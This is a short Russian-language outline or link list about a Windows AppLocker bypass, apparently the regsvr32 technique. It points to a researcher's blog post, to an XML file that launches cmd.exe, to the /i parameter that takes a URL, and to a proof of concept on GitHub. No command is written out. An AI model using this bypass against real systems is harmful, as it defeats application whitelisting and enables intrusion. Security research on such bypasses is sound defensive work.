Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Материалы:
Windows AppLocker 
Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html
Regsvr32 
XML-файл запускающий cmd.exe 
Как параметр /i отвечает за ссылку и DLLinstall 
Proof-of-conceptна исследователя на GitHub 
Пруф